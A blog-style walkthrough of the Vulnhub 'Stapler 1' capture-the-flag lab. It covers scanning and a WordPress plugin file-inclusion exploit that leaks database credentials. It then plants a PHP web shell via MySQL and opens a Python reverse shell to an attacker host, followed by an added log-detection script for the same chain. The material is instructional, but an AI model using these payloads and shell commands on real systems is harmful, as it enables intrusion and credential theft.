Stapler 1

Finally getting back to the purpose of this blog! I know I'm going to be rusty, but let's dive right back into the original Vulnhub plans. This one was nice and easy to get running: [Figure 1] Diving right in, here's the nmap result:

Nmap scan report for 10.10.10.10
Host is up (0.00064s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
53/tcp   open   domain
80/tcp   open   http
139/tcp  open   netbios-ssn
666/tcp  open   doom
3306/tcp open   mysql
MAC Address: 08:00:27:5C:69:0C (Oracle VirtualBox virtual NIC)

FTP is going to be a target, no doubt; we also want to check out what's running on port 80, and we love seeing a web server next to MySQL! Doom on port 666? That's a troll for sure; I don't know anything about LAN Doom exploits, yet. I searched exploit-db for doom, no hits. The web server's root page renders this HTML: [Figure 2] I ran dirbuster on it with no results... we'll come back to this. I ran the Metasploit module to identify the FTP version:

msf6 > search ftp_version
Matching Modules
================
   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/ftp/ftp_version                   normal  No     FTP Version Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf6 auxiliary(scanner/ftp/ftp_version) > run
[+] 10.10.10.10:21        - FTP Banner: '220-\x0d\x0a220-|-----------------------------------------------------------------------------------------|\x0d\x0a220-| Harry, make sure to update the banner when you get a chance to show who has access here |\x0d\x0a220-|-----------------------------------------------------------------------------------------|\x0d\x0a220-\x0d\x0a220 \x0d\x0a'
[*] 10.10.10.10:21        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Looks like we couldn't get a version... however, we now know that an admin user's first name is Harry. I decided to connect to the server and see if the status command would disclose a version; no dice:

ftp> status
Connected to 10.10.10.10.
No proxy connection.
Connecting using address family: any.
Mode: stream; Type: ascii; Form: non-print; Structure: file
Verbose: on; Bell: off; Prompting: on; Globbing: on
Store unique: off; Receive unique: off
Case: off; CR stripping: on
Quote control characters: on
Ntrans: off
Nmap: off
Hash mark printing: off; Use of PORT cmds: on
Tick counter printing: off

I circled back to the HTTP port and started up a more robust traversal tool, dotdotpwn; after it ran for about 30 minutes (I was cooking food) there were no hits... Surely the web stack here isn't for nothing... I ran nikto:

└─$ nikto --host 10.10.10.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.10
+ Target Hostname:    10.10.10.10
+ Target Port:        80
+ Start Time:         2021-01-02 18:00:41 (GMT-5)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 5 item(s) reported on remote host
+ End Time:           2021-01-02 18:00:50 (GMT-5) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Interesting: apparently the server is serving up a .bashrc and a .profile? Let's check it out:

└─$ curl 10.10.10.10/.bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac
# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color|*-256color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
	# We have color support; assume it's compliant with Ecma-48
	# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
	# a case would tend to support setf rather than setaf.)
	color_prompt=yes
    else
	color_prompt=
    fi
fi
if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'
    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi
# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'
# Add an "alert" alias for long running commands.  Use like so:
#   sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

Nothing of interest there, except the fact that we can seemingly read files out of a user's home directory over HTTP.

└─$ curl 10.10.10.10/.profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022
# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
	. "$HOME/.bashrc"
    fi
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

I tried poking around to read some other common files... but realized I don't even know what OS this is running yet! Let's run a better nmap...

└─$ sudo nmap -O -p- 10.10.10.10
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-02 18:18 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.10.10
Host is up (0.00043s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 08:00:27:5C:69:0C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.14 seconds

Not the most useful OS detection, but we've found a new service!

$ curl 10.10.10.10:12380
...
big html response
...

Loaded in a browser: [Figure 3] Okay, this looks more interesting... Nothing in searchsploit for Creative Tim. Nikto against the port:

└─$ nikto --host 10.10.10.10 --port 12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.10
+ Target Hostname:    10.10.10.10
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2021-01-02 18:27:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '10.10.10.10' does not match certificate's names: Red.Initech
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7993 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2021-01-02 18:30:00 (GMT-5) (143 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

First, searching the Apache version: it's vulnerable to a local privilege escalation we may be able to use later on. Now, I tried phpmyadmin, but it just redirects to the homepage. Actually, it seems like everything redirects to the homepage. Perhaps HTTPS has different behavior? I tried https /admin112233, and I think I got rekt... [Figure 4] I'm not sure what BeEF-XSS is, but I certainly should be! Wow, yeah, I still have a lot to learn... It's essentially an exploit kit, open-source, and it ships with Kali. I guess I should be blocking JS execution in my browser. Moving on: if I use HTTPS I can load the phpmyadmin page! Great news. A few default username/password combinations didn't work. Here's the robots.txt:

User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

And finally, we get a little blog on /blogblog [Figure 5] I clicked the login button, and got a WordPress login page: [Figure 6] You love to see that; this may be the end of the road... from the msfconsole:

msf6 auxiliary(scanner/http/ntlm_info_enumeration) > use auxiliary/scanner/http/wordpress_scanner
msf6 auxiliary(scanner/http/wordpress_scanner) > info
       Name: Wordpress Scanner
     Module: auxiliary/scanner/http/wordpress_scanner
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  Christian Mehlmauer <FireFart@gmail.com>
  h00die
Check supported:
  No
Basic options:
  Name          Current Setting                                                Required  Description
  ----          ---------------                                                --------  -----------
  PLUGINS       true                                                           no        Detect plugins
  PLUGINS_FILE  /usr/share/metasploit-framework/data/wordlists/wp-plugins.txt  yes       File containing plugins to enumerate
  PROGRESS      1000                                                           yes       how often to print progress
  Proxies                                                                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         80                                                             yes       The target port (TCP)
  SSL           false                                                          no        Negotiate SSL/TLS for outgoing connections
  TARGETURI     /                                                              yes       The base path to the wordpress application
  THEMES        true                                                           no        Detect themes
  THEMES_FILE   /usr/share/metasploit-framework/data/wordlists/wp-themes.txt   yes       File containing themes to enumerate
  THREADS       1                                                              yes       The number of concurrent threads (max one per host)
  VHOST                                                                        no        HTTP server virtual host
Description:
  Detects Wordpress Versions, Themes, and Plugins
msf6 auxiliary(scanner/http/wordpress_scanner) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf6 auxiliary(scanner/http/wordpress_scanner) > set RPORT 12380
RPORT => 12380
msf6 auxiliary(scanner/http/wordpress_scanner) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 auxiliary(scanner/http/wordpress_scanner) > set TARGETURI /blogblog
TARGETURI => /blogblog
msf6 auxiliary(scanner/http/wordpress_scanner) > run
[*] Trying 10.10.10.10
[+] 10.10.10.10 - Detected Wordpress 4.2.1

Searchsploit for the version:

└─$ searchsploit wordpress 4.2.1
------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                |  Path
------------------------------------------------------------------------------ ---------------------------------
WordPress Core < 4.7.1 - Username Enumeration                                 | php/webapps/41497.php
WordPress Core < 4.7.4 - Unauthorized Password Reset                          | linux/webapps/41963.txt
WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion              | php/webapps/44949.txt
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts       | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service                       | php/dos/47800.py
WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit)   | php/remote/47187.rb
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities           | php/webapps/39553.txt
WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities          | php/webapps/38176.txt
WordPress Plugin Foxypress 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload          | php/webapps/18991.php
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection                     | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection                   | php/webapps/48918.sh
WordPress Plugin User Role Editor < 4.25 - Privilege Escalation               | php/webapps/44595.rb
WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass                   | php/webapps/43117.txt
WordPress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation    | php/webapps/46083.txt
WordPress Theme F8 Lite 4.2.1 - 's' Cross-Site Scripting                      | php/webapps/36180.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Knowing the users could be useful...

└─$ cat /usr/share/exploitdb/exploits/php/webapps/41497.php
#!/usr/bin/php
<?php
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: dctoralves@protonmail.ch
#Site: https://mateuslino.tk
header ('Content-type: text/html; charset=UTF-8');
$url= "http://localhost/";
$payload="wp-json/wp/v2/users/";
# The WP REST API user listing is public by default on this WordPress version
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
    echo "*-----------------------------*\n";
    foreach($json as $users){
        echo "[*] ID :  |" .$users['id']     ."|\n";
        echo "[*] Name: |" .$users['name']   ."|\n";
        echo "[*] User :|" .$users['slug']   ."|\n";
        echo "\n";
    }
    echo "*-----------------------------*";
} else {
    echo "[*] No user";
}
?>

I tried 'https://10.10.10.10/blogblog/wp-json/wp/v2/users' and 'https://10.10.10.10/wp-json/wp/v2/users' with no success. Every WordPress site has a wp-content directory where we may be able to find the plugins that are installed, which ended up being true! [Figure 7] Searching these on exploit-db...

└─$ searchsploit wordpress advanced video
WordPress Plugin Advanced Video 1.0 - Local File Inclusion                    | php/webapps/39646.py

[Figure 8] And nothing for two-factor. ShortCode was the most interesting, so I checked the version, which seemed to be 0.1, but then I realized shortcode could be all sorts of things. I think it's best to try the local file inclusion vector we were first presented with...

#!/usr/bin/env python
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2
#	Timeline
#	03/24/2016 - Bug discovered
#	03/24/2016 - Initial notification of vendor
#	04/01/2016 - No answer from vendor, public release of bug 
# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:
#  function ave_publishPost(){
#    $title = $_REQUEST['title'];
#    $term = $_REQUEST['term'];
#    $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
#    $image_data = file_get_contents($thumb);
# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]
# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)
import random
import urllib2
import re
url = "http://127.0.0.1/wordpress" # insert url to wordpress
randomID = long(random.random() * 100000000000000000L)
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =  objHtml.readlines()
for line in content:
	numbers = re.findall(r'\d+',line)
	id = numbers[-1]
	id = int(id) / 10
objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()
for line in content:
	if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
		urls=re.findall('"(https?://.*?)"', line)
		print urllib2.urlopen(urls[0]).read() 

So, I made a copy and edited the url to match our target, and ran it:

└─$ python x.py 
Traceback (most recent call last):
  File "x.py", line 41, in <module>
    objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
  File "/usr/lib/python2.7/urllib2.py", line 154, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 429, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 447, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 407, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1241, in https_open
    context=self._context)
  File "/usr/lib/python2.7/urllib2.py", line 1198, in do_open
    raise URLError(err)
urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)>

Alright, after a bit of StackOverflow reading, every way I tried to disable SSL validation failed for some reason, so I just ran it manually:

$ curl "https://10.10.10.10:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=100000000000000000&short=rnd&term=rnd&thumb=../wp-config.php" --insecure
https://10.10.10.10:12380/blogblog/?p=290

This writes the fetched file into wp-content/uploads as the new post's thumbnail image: we can then download that file and print out its contents to get the wp-config file!

└─$ wget --no-check-certificate https://10.10.10.10:12380/blogblog/wp-content/uploads/305460154.jpeg
--2021-01-02 21:45:08--  https://10.10.10.10:12380/blogblog/wp-content/uploads/305460154.jpeg
Connecting to 10.10.10.10:12380... connected.
WARNING: The certificate of ‘10.10.10.10’ is not trusted.
WARNING: The certificate of ‘10.10.10.10’ doesn't have a known issuer.
The certificate's owner does not match hostname ‘10.10.10.10’
HTTP request sent, awaiting response... 200 OK
Length: 3042 (3.0K) [image/jpeg]
Saving to: ‘305460154.jpeg’
305460154.jpeg      100%[==========================>]   2.97K  --.-KB/s    in 0s
2021-01-02 21:45:08 (111 MB/s) - ‘305460154.jpeg’ saved [3042/3042]

┌──(kali㉿kali)-[~/tmp]
└─$ cat 305460154.jpeg
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/
/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';
/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);
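As an added example (not from the original writeup), here is detection logic a defender could run over the Apache access log for the chain above: dotfile probing on port 80, an ave_publishPost call whose thumb parameter is not an http(s) URL, and PHP being requested from wp-content/uploads. The log lines are constructed to mirror this writeup's requests (10.10.10.9 is the attacking box from the reverse-shell step), and a byte-signature check shows how a host-side job would catch the wp-config.php stored as a .jpeg.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" access-log format as shipped on Ubuntu (the target runs
# Apache/2.4.18 per nikto). Only the fields the rules need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not taken from the real box) that mirror the
# requests in this writeup: dotfile probing on port 80, a legitimate
# ave_publishPost call, the traversal call, fetching the resulting "jpeg",
# and a request for a PHP file sitting under wp-content/uploads.
SAMPLE_LOG = """\
10.10.10.9 - - [02/Jan/2021:18:00:45 -0500] "GET /.bashrc HTTP/1.1" 200 3771
10.10.10.9 - - [02/Jan/2021:18:00:46 -0500] "GET /.profile HTTP/1.1" 200 655
10.10.10.9 - - [02/Jan/2021:21:39:10 -0500] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=demo&short=1&term=1&thumb=https://example.com/poster.jpg HTTP/1.1" 200 45
10.10.10.9 - - [02/Jan/2021:21:40:01 -0500] "GET /blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=100000000000000000&short=rnd&term=rnd&thumb=../wp-config.php HTTP/1.1" 200 45
10.10.10.9 - - [02/Jan/2021:21:45:08 -0500] "GET /blogblog/wp-content/uploads/305460154.jpeg HTTP/1.1" 200 3042
10.10.10.9 - - [02/Jan/2021:22:10:33 -0500] "GET /blogblog/wp-content/uploads/shell.php?cmd=id HTTP/1.1" 200 54
10.10.10.9 - - [02/Jan/2021:22:11:00 -0500] "GET /blogblog/?p=290 HTTP/1.1" 200 9123
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["route"] = unquote(parts.path)
    # keep the first value of each parameter; parse_qs already URL-decodes
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec


def is_dotfile_request(rec):
    """Any path segment starting with '.' (/.bashrc, /.profile, /.git/...)."""
    return any(seg.startswith(".") for seg in rec["route"].split("/") if seg)


def is_ave_local_read(rec):
    """ave_publishPost whose 'thumb' is not an absolute http(s) URL.

    The plugin passes thumb straight to file_get_contents(), so anything
    else (a relative path, ../wp-config.php, a missing value) is a local
    file read rather than the video poster it was meant to fetch."""
    if not rec["route"].endswith("/wp-admin/admin-ajax.php"):
        return False
    if rec["query"].get("action") != "ave_publishPost":
        return False
    thumb = rec["query"].get("thumb", "")
    return not thumb.lower().startswith(("http://", "https://"))


def is_php_under_uploads(rec):
    """A script served from wp-content/uploads, which should hold only media."""
    return re.search(r"/wp-content/uploads/.*\.php\d?$", rec["route"], re.I) is not None


RULES = (
    ("dotfile-request", is_dotfile_request),
    ("ave_publishPost-local-read", is_ave_local_read),
    ("php-under-uploads", is_php_under_uploads),
)


def analyze(log_text):
    """Run every rule over every parseable line; return (rule, ip, route, status)."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, rule in RULES:
            if rule(rec):
                findings.append((name, rec["ip"], rec["route"], rec["status"]))
    return findings


# The fetched file lands under uploads with an image extension whatever it
# contains, so the access log alone cannot tell wp-config.php from a real
# picture. A host-side check on the first bytes can: real JPEG/PNG/GIF files
# begin with a fixed signature, while the "jpeg" in this writeup begins "<?php".
IMAGE_SIGNATURES = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")


def upload_is_image(data):
    return any(data.startswith(sig) for sig in IMAGE_SIGNATURES)


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print("%-28s %-12s %s (HTTP %s)" % finding)
    print("looks like an image:", upload_is_image(b"<?php\n/**\n * The base configurations"))
```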

Now we have the MySQL root username and password! Logging into phpmyadmin, bingo! [Figure 9] The version of phpmyadmin running isn't vulnerable to any common exploits, so let's move on to trying a root MySQL shell.

# Login as root on mysql server
$ mysql -u root -p -h 10.10.10.10
# Switch to known-existing database
sql> use wordpress
# Attempt backdoor
sql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
# Locally
$ nc -lp 4444
# In browser:
https://10.10.10.10:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.10.9%22,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
# Reverse Shell
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -r
4.4.0-21-generic

I searched the kernel version, and there are a ton of privilege-escalation vulnerabilities... but let's explore a little first and see what else we can do. Get a bash shell:

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@red:/home$ find . -readable
find . -readable
.
./MFrei
./MFrei/.bashrc
./MFrei/.bash_history
./MFrei/.bash_logout
./MFrei/.profile
./Sam
./Sam/.bashrc
./Sam/.bash_history
./Sam/.bash_logout
./Sam/.profile
./CCeaser
./CCeaser/.bashrc
./CCeaser/.bash_history
./CCeaser/.bash_logout
./CCeaser/.profile
./www
./www/.bashrc
./www/.bash_logout
./www/.profile
./DSwanger
./DSwanger/.bashrc
./DSwanger/.bash_history
./DSwanger/.bash_logout
./DSwanger/.profile
./JBare
./JBare/.bashrc
./JBare/.bash_history
./JBare/.bash_logout
./JBare/.profile
./mel
./mel/.bashrc
./mel/.bash_history
./mel/.bash_logout
./mel/.profile
./jess
./jess/.bashrc
./jess/.bash_history
./jess/.bash_logout
./jess/.profile
./MBassin
./MBassin/.bashrc
./MBassin/.bash_history
./MBassin/.bash_logout
./MBassin/.profile
./kai
./kai/.bashrc
./kai/.bash_history
./kai/.bash_logout
./kai/.profile
./elly
./elly/.bashrc
./elly/.bash_history
./elly/.bash_logout
./elly/.profile
./Drew
./Drew/.bashrc
./Drew/.bash_history
